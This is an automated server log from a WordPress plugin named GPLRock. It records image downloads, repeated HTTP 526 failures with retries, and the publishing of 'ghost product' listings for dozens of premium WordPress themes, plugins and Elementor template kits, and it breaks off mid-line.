[04-Apr-2026 07:49:11 UTC] GPLRock: Image downloaded successfully for product auxo-minimal-woocommerce-shopping-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-900dcd74.jpg [04-Apr-2026 07:49:11 UTC] GPLRock: Using pre-downloaded image for product auxo-minimal-woocommerce-shopping-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-900dcd74.jpg [04-Apr-2026 07:49:11 UTC] GPLRock: Ghost product published with image - Product ID: auxo-minimal-woocommerce-shopping-wordpress-theme [04-Apr-2026 07:50:03 UTC] GPLRock: Image download failed for product sprout-clean-blognewsmagazine-responsive-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:50:05 UTC] GPLRock: Image download failed for product sprout-clean-blognewsmagazine-responsive-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:50:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/sprout---clean-blognewsmagazine-responsive-theme-8872.webp for product sprout-clean-blognewsmagazine-responsive-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:50:08 UTC] GPLRock: Image download failed for product sprout-clean-blognewsmagazine-responsive-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:50:10 UTC] GPLRock: Image download failed for product sprout-clean-blognewsmagazine-responsive-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:50:12 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/sprout---clean-blognewsmagazine-responsive-theme-8872.webp for product sprout-clean-blognewsmagazine-responsive-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:50:12 UTC] GPLRock WARNING: Image download failed for product sprout-clean-blognewsmagazine-responsive-theme. URL: https://meldwp.com/wp-content/uploads/sprout---clean-blognewsmagazine-responsive-theme-8872.webp [04-Apr-2026 07:50:12 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: sprout-clean-blognewsmagazine-responsive-theme [04-Apr-2026 07:50:12 UTC] GPLRock: Image download failed for product organio-organic-food-store-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:50:14 UTC] GPLRock: Image download failed for product organio-organic-food-store-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:50:16 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/organio---organic-food-store-wordpress-2010.webp for product organio-organic-food-store-wordpress after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:50:16 UTC] GPLRock: Image download failed for product organio-organic-food-store-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:50:18 UTC] GPLRock: Image download failed for product organio-organic-food-store-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:50:21 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/organio---organic-food-store-wordpress-2010.webp for product organio-organic-food-store-wordpress after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:50:21 UTC] GPLRock WARNING: Image download failed for product organio-organic-food-store-wordpress. URL: https://meldwp.com/wp-content/uploads/organio---organic-food-store-wordpress-2010.webp [04-Apr-2026 07:50:21 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: organio-organic-food-store-wordpress [04-Apr-2026 07:50:21 UTC] GPLRock: Image download failed for product molla-ecommerce-html5-template (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:50:23 UTC] GPLRock: Image download failed for product molla-ecommerce-html5-template (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:50:25 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/molla---ecommerce-html5-template-31753.webp for product molla-ecommerce-html5-template after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:50:25 UTC] GPLRock: Image download failed for product molla-ecommerce-html5-template (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:50:27 UTC] GPLRock: Image download failed for product molla-ecommerce-html5-template (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:50:29 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/molla---ecommerce-html5-template-31753.webp for product molla-ecommerce-html5-template after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:50:29 UTC] GPLRock WARNING: Image download failed for product molla-ecommerce-html5-template. URL: https://meldwp.com/wp-content/uploads/molla---ecommerce-html5-template-31753.webp [04-Apr-2026 07:50:29 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: molla-ecommerce-html5-template [04-Apr-2026 07:50:30 UTC] GPLRock: Image download failed for product eduvision-online-course-multipurpose-education-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:50:32 UTC] GPLRock: Image download failed for product eduvision-online-course-multipurpose-education-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:50:34 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/eduvision---online-course-multipurpose-education-wordpress-theme-6840.webp for product eduvision-online-course-multipurpose-education-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:50:34 UTC] GPLRock: Image download failed for product eduvision-online-course-multipurpose-education-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:50:36 UTC] GPLRock: Image download failed for product eduvision-online-course-multipurpose-education-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:50:38 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/eduvision---online-course-multipurpose-education-wordpress-theme-6840.webp for product eduvision-online-course-multipurpose-education-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:50:38 UTC] GPLRock WARNING: Image download failed for product eduvision-online-course-multipurpose-education-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/eduvision---online-course-multipurpose-education-wordpress-theme-6840.webp [04-Apr-2026 07:50:38 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: eduvision-online-course-multipurpose-education-wordpress-theme [04-Apr-2026 07:50:38 UTC] GPLRock: Image downloaded successfully for product mojito-digital-agency-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-aa58e35b.webp [04-Apr-2026 07:50:38 UTC] GPLRock: Using pre-downloaded image for product mojito-digital-agency-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-aa58e35b.webp [04-Apr-2026 07:50:38 UTC] GPLRock: Ghost product published with image - Product ID: mojito-digital-agency-wordpress-theme [04-Apr-2026 07:50:38 UTC] GPLRock: Image download failed for product ollis-architecture-agency-interior-design-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:50:41 UTC] GPLRock: Image download failed for product ollis-architecture-agency-interior-design-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:50:43 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ollis---architecture-agency--interior-design-wordpress-theme-18357.webp for product ollis-architecture-agency-interior-design-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:50:43 UTC] GPLRock: Image download failed for product ollis-architecture-agency-interior-design-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:50:45 UTC] GPLRock: Image download failed for product ollis-architecture-agency-interior-design-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:50:47 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ollis---architecture-agency--interior-design-wordpress-theme-18357.webp for product ollis-architecture-agency-interior-design-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:50:47 UTC] GPLRock WARNING: Image download failed for product ollis-architecture-agency-interior-design-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/ollis---architecture-agency--interior-design-wordpress-theme-18357.webp [04-Apr-2026 07:50:47 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: ollis-architecture-agency-interior-design-wordpress-theme [04-Apr-2026 07:50:47 UTC] GPLRock: Image downloaded successfully for product appset-app-landing-page-wordpress-responsive-theme-in-marketing-blog-digital-portfolio-showcase (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-dd5bb971.webp [04-Apr-2026 07:50:47 UTC] GPLRock: Using pre-downloaded image for product appset-app-landing-page-wordpress-responsive-theme-in-marketing-blog-digital-portfolio-showcase: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-dd5bb971.webp [04-Apr-2026 07:50:47 UTC] GPLRock: Ghost product published with image - Product ID: appset-app-landing-page-wordpress-responsive-theme-in-marketing-blog-digital-portfolio-showcase [04-Apr-2026 07:50:47 UTC] GPLRock: Image download failed for product zikzag-consulting-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:50:49 UTC] GPLRock: Image download failed for product zikzag-consulting-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:50:51 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/zikzag---consulting--agency-wordpress-theme-848.webp for product zikzag-consulting-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:50:52 UTC] GPLRock: Image download failed for product zikzag-consulting-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:50:54 UTC] GPLRock: Image download failed for product zikzag-consulting-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:50:56 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/zikzag---consulting--agency-wordpress-theme-848.webp for product zikzag-consulting-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:50:56 UTC] GPLRock WARNING: Image download failed for product zikzag-consulting-agency-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/zikzag---consulting--agency-wordpress-theme-848.webp [04-Apr-2026 07:50:56 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: zikzag-consulting-agency-wordpress-theme [04-Apr-2026 07:50:56 UTC] GPLRock: Image download failed for product equestrian-horses-and-stables-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:50:58 UTC] GPLRock: Image download failed for product equestrian-horses-and-stables-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:51:00 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/equestrian---horses-and-stables-wordpress-theme-22259.webp for product equestrian-horses-and-stables-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:51:00 UTC] GPLRock: Image download failed for product equestrian-horses-and-stables-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:51:02 UTC] GPLRock: Image download failed for product equestrian-horses-and-stables-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:51:04 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/equestrian---horses-and-stables-wordpress-theme-22259.webp for product equestrian-horses-and-stables-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:51:04 UTC] GPLRock WARNING: Image download failed for product equestrian-horses-and-stables-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/equestrian---horses-and-stables-wordpress-theme-22259.webp [04-Apr-2026 07:51:04 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: equestrian-horses-and-stables-wordpress-theme [04-Apr-2026 07:51:05 UTC] GPLRock: Image download failed for product trevox-fashion-and-clothing-store-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:51:07 UTC] GPLRock: Image download failed for product trevox-fashion-and-clothing-store-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:51:09 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/trevox---fashion-and-clothing-store-theme-26336.webp for product trevox-fashion-and-clothing-store-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:51:09 UTC] GPLRock: Image download failed for product trevox-fashion-and-clothing-store-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:51:11 UTC] GPLRock: Image download failed for product trevox-fashion-and-clothing-store-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:51:13 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/trevox---fashion-and-clothing-store-theme-26336.webp for product trevox-fashion-and-clothing-store-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:51:13 UTC] GPLRock WARNING: Image download failed for product trevox-fashion-and-clothing-store-theme. URL: https://meldwp.com/wp-content/uploads/trevox---fashion-and-clothing-store-theme-26336.webp [04-Apr-2026 07:51:13 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: trevox-fashion-and-clothing-store-theme [04-Apr-2026 07:51:51 UTC] GPLRock: Image downloaded successfully for product hashtag-social-media-agency-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-2dc6ba79.jpg [04-Apr-2026 07:51:51 UTC] GPLRock: Using pre-downloaded image for product hashtag-social-media-agency-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-2dc6ba79.jpg [04-Apr-2026 07:51:51 UTC] GPLRock: Ghost product published with image - Product ID: hashtag-social-media-agency-elementor-template-kit [04-Apr-2026 07:51:53 UTC] GPLRock: Image downloaded successfully for product hardy-photography-portfolio-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-1e5ceceb.jpg [04-Apr-2026 07:51:53 UTC] GPLRock: Using pre-downloaded image for product hardy-photography-portfolio-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-1e5ceceb.jpg [04-Apr-2026 07:51:53 UTC] GPLRock: Ghost product published with image - Product ID: hardy-photography-portfolio-elementor-template-kit [04-Apr-2026 07:51:54 UTC] GPLRock: Image downloaded successfully for product hangar-aviation-flight-school-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b7c5b848.webp [04-Apr-2026 07:51:54 UTC] GPLRock: Using pre-downloaded image for product hangar-aviation-flight-school-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b7c5b848.webp [04-Apr-2026 07:51:54 UTC] GPLRock: Ghost product published with image - Product ID: hangar-aviation-flight-school-elementor-template-kit [04-Apr-2026 07:51:56 UTC] GPLRock: Image downloaded successfully for product gymness-sport-fitness-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ba32fb69.webp [04-Apr-2026 07:51:56 UTC] GPLRock: Using pre-downloaded image for product gymness-sport-fitness-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ba32fb69.webp [04-Apr-2026 07:51:56 UTC] GPLRock: Ghost product published with image - Product ID: gymness-sport-fitness-elementor-template-kit [04-Apr-2026 07:51:57 UTC] GPLRock: Image downloaded successfully for product gymna-fitness-gym-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-3d18922b.webp [04-Apr-2026 07:51:57 UTC] GPLRock: Using pre-downloaded image for product gymna-fitness-gym-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-3d18922b.webp [04-Apr-2026 07:51:57 UTC] GPLRock: Ghost product published with image - Product ID: gymna-fitness-gym-elementor-template-kit [04-Apr-2026 07:51:58 UTC] GPLRock: Image downloaded successfully for product gymmy-fitness-gym-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ae7effcf.webp [04-Apr-2026 07:51:58 UTC] GPLRock: Using pre-downloaded image for product gymmy-fitness-gym-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ae7effcf.webp [04-Apr-2026 07:51:58 UTC] GPLRock: Ghost product published with image - Product ID: gymmy-fitness-gym-elementor-template-kit [04-Apr-2026 07:51:59 UTC] GPLRock: Image downloaded successfully for product gymax-gym-fitness-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a29f5fa2.webp [04-Apr-2026 07:51:59 UTC] GPLRock: Using pre-downloaded image for product gymax-gym-fitness-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a29f5fa2.webp [04-Apr-2026 07:51:59 UTC] GPLRock: Ghost product published with image - Product ID: gymax-gym-fitness-elementor-template-kit [04-Apr-2026 07:52:03 UTC] GPLRock: Image downloaded successfully for product gwen-blog-magazine-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-aef30cbf.webp [04-Apr-2026 07:52:03 UTC] GPLRock: Using pre-downloaded image for product gwen-blog-magazine-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-aef30cbf.webp [04-Apr-2026 07:52:03 UTC] GPLRock: Ghost product published with image - Product ID: gwen-blog-magazine-elementor-template-kit [04-Apr-2026 07:52:05 UTC] GPLRock: Image downloaded successfully for product gute-minimalist-blog-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-3e57f690.webp [04-Apr-2026 07:52:05 UTC] GPLRock: Using pre-downloaded image for product gute-minimalist-blog-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-3e57f690.webp [04-Apr-2026 07:52:05 UTC] GPLRock: Ghost product published with image - Product ID: gute-minimalist-blog-elementor-template-kit [04-Apr-2026 07:52:07 UTC] GPLRock: Image downloaded successfully for product gunomic-shooting-range-gun-club-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-fc4e2c75.jpg [04-Apr-2026 07:52:07 UTC] GPLRock: Using pre-downloaded image for product gunomic-shooting-range-gun-club-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-fc4e2c75.jpg [04-Apr-2026 07:52:07 UTC] GPLRock: Ghost product published with image - Product ID: gunomic-shooting-range-gun-club-elementor-template-kit [04-Apr-2026 07:53:35 UTC] GPLRock: Image downloaded successfully for product css-igniter-space9-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-76bf40d6.jpg [04-Apr-2026 07:53:35 UTC] GPLRock: Using pre-downloaded image for product css-igniter-space9-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-76bf40d6.jpg [04-Apr-2026 07:53:35 UTC] GPLRock: Ghost product published with image - Product ID: css-igniter-space9-wordpress-theme [04-Apr-2026 07:53:36 UTC] GPLRock: Image downloaded successfully for product css-igniter-prayer-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-13001a2f.jpg [04-Apr-2026 07:53:36 UTC] GPLRock: Using pre-downloaded image for product css-igniter-prayer-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-13001a2f.jpg [04-Apr-2026 07:53:36 UTC] GPLRock: Ghost product published with image - Product ID: css-igniter-prayer-wordpress-theme [04-Apr-2026 07:53:38 UTC] GPLRock: Image downloaded successfully for product secupress-pro (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-717bed0d.jpg [04-Apr-2026 07:53:38 UTC] GPLRock: Using pre-downloaded image for product secupress-pro: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-717bed0d.jpg [04-Apr-2026 07:53:38 UTC] GPLRock: Ghost product published with image - Product ID: secupress-pro [04-Apr-2026 07:53:39 UTC] GPLRock: Image downloaded successfully for product mainwp-url-extractor (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-44588d2e.jpg [04-Apr-2026 07:53:39 UTC] GPLRock: Using pre-downloaded image for product mainwp-url-extractor: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-44588d2e.jpg [04-Apr-2026 07:53:39 UTC] GPLRock: Ghost product published with image - Product ID: mainwp-url-extractor [04-Apr-2026 07:53:41 UTC] GPLRock: Image downloaded successfully for product css-igniter-sessions-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b5b751b5.jpg [04-Apr-2026 07:53:41 UTC] GPLRock: Using pre-downloaded image for product css-igniter-sessions-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b5b751b5.jpg [04-Apr-2026 07:53:41 UTC] GPLRock: Ghost product published with image - Product ID: css-igniter-sessions-wordpress-theme [04-Apr-2026 07:53:42 UTC] GPLRock: Image downloaded successfully for product woocommerce-mollie (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-b030e808.jpg [04-Apr-2026 07:53:42 UTC] GPLRock: Using pre-downloaded image for product woocommerce-mollie: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-b030e808.jpg [04-Apr-2026 07:53:42 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-mollie [04-Apr-2026 07:53:44 UTC] GPLRock: Image downloaded successfully for product super-forms-woocommerce-checkout (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ae5ab776.jpg [04-Apr-2026 07:53:44 UTC] GPLRock: Using pre-downloaded image for product super-forms-woocommerce-checkout: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ae5ab776.jpg [04-Apr-2026 07:53:44 UTC] GPLRock: Ghost product published with image - Product ID: super-forms-woocommerce-checkout [04-Apr-2026 07:53:45 UTC] GPLRock: Image downloaded successfully for product woocommerce-splash-popup (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d8439cf8.jpg [04-Apr-2026 07:53:45 UTC] GPLRock: Using pre-downloaded image for product woocommerce-splash-popup: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d8439cf8.jpg [04-Apr-2026 07:53:45 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-splash-popup [04-Apr-2026 07:53:46 UTC] GPLRock: Image downloaded successfully for product wpmu-dev-site-categories (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5267e4a8.jpg [04-Apr-2026 07:53:47 UTC] GPLRock: Using pre-downloaded image for product wpmu-dev-site-categories: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5267e4a8.jpg [04-Apr-2026 07:53:47 UTC] GPLRock: Ghost product published with image - Product ID: wpmu-dev-site-categories [04-Apr-2026 07:53:48 UTC] GPLRock: Image downloaded successfully for product covid-19-coronavirus-live-map-widgets-for-wordpress (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a7d1d2a9.jpg [04-Apr-2026 07:53:48 UTC] GPLRock: Using pre-downloaded image for product covid-19-coronavirus-live-map-widgets-for-wordpress: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a7d1d2a9.jpg [04-Apr-2026 07:53:48 UTC] GPLRock: Ghost product published with image - Product ID: covid-19-coronavirus-live-map-widgets-for-wordpress [04-Apr-2026 07:55:27 UTC] GPLRock: Image download failed for product careox-non-profit-charity-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:55:29 UTC] GPLRock: Image download failed for product careox-non-profit-charity-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:55:31 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/careox---non-profit-charity-wordpress-theme-16616.webp for product careox-non-profit-charity-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:55:31 UTC] GPLRock: Image download failed for product careox-non-profit-charity-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:55:33 UTC] GPLRock: Image download failed for product careox-non-profit-charity-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:55:35 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/careox---non-profit-charity-wordpress-theme-16616.webp for product careox-non-profit-charity-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:55:35 UTC] GPLRock WARNING: Image download failed for product careox-non-profit-charity-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/careox---non-profit-charity-wordpress-theme-16616.webp [04-Apr-2026 07:55:35 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: careox-non-profit-charity-wordpress-theme [04-Apr-2026 07:55:35 UTC] GPLRock: Image download failed for product branchy-wp-elementor-multi-purpose-woocommerce-responsive-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:55:38 UTC] GPLRock: Image download failed for product branchy-wp-elementor-multi-purpose-woocommerce-responsive-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:55:40 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/branchy-wp---elementor-multi-purpose-woocommerce-responsive-theme-25836.webp for product branchy-wp-elementor-multi-purpose-woocommerce-responsive-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:55:40 UTC] GPLRock: Image download failed for product branchy-wp-elementor-multi-purpose-woocommerce-responsive-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:55:42 UTC] GPLRock: Image download failed for product branchy-wp-elementor-multi-purpose-woocommerce-responsive-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:55:44 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/branchy-wp---elementor-multi-purpose-woocommerce-responsive-theme-25836.webp for product branchy-wp-elementor-multi-purpose-woocommerce-responsive-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:55:44 UTC] GPLRock WARNING: Image download failed for product branchy-wp-elementor-multi-purpose-woocommerce-responsive-theme. URL: https://meldwp.com/wp-content/uploads/branchy-wp---elementor-multi-purpose-woocommerce-responsive-theme-25836.webp [04-Apr-2026 07:55:44 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: branchy-wp-elementor-multi-purpose-woocommerce-responsive-theme [04-Apr-2026 07:55:44 UTC] GPLRock: Image downloaded successfully for product luxmed-medicine-healthcare-doctor-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-cd089994.webp [04-Apr-2026 07:55:44 UTC] GPLRock: Using pre-downloaded image for product luxmed-medicine-healthcare-doctor-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-cd089994.webp [04-Apr-2026 07:55:44 UTC] GPLRock: Ghost product published with image - Product ID: luxmed-medicine-healthcare-doctor-wordpress-theme [04-Apr-2026 07:55:44 UTC] GPLRock: Image download failed for product tukio-event-landing-page-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:55:46 UTC] GPLRock: Image download failed for product tukio-event-landing-page-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:55:48 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/tukio--event-landing-page-wordpress-theme-18168.webp for product tukio-event-landing-page-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:55:49 UTC] GPLRock: Image download failed for product tukio-event-landing-page-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:55:51 UTC] GPLRock: Image download failed for product tukio-event-landing-page-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:55:53 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/tukio--event-landing-page-wordpress-theme-18168.webp for product tukio-event-landing-page-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:55:53 UTC] GPLRock WARNING: Image download failed for product tukio-event-landing-page-wordpress-theme. URL: 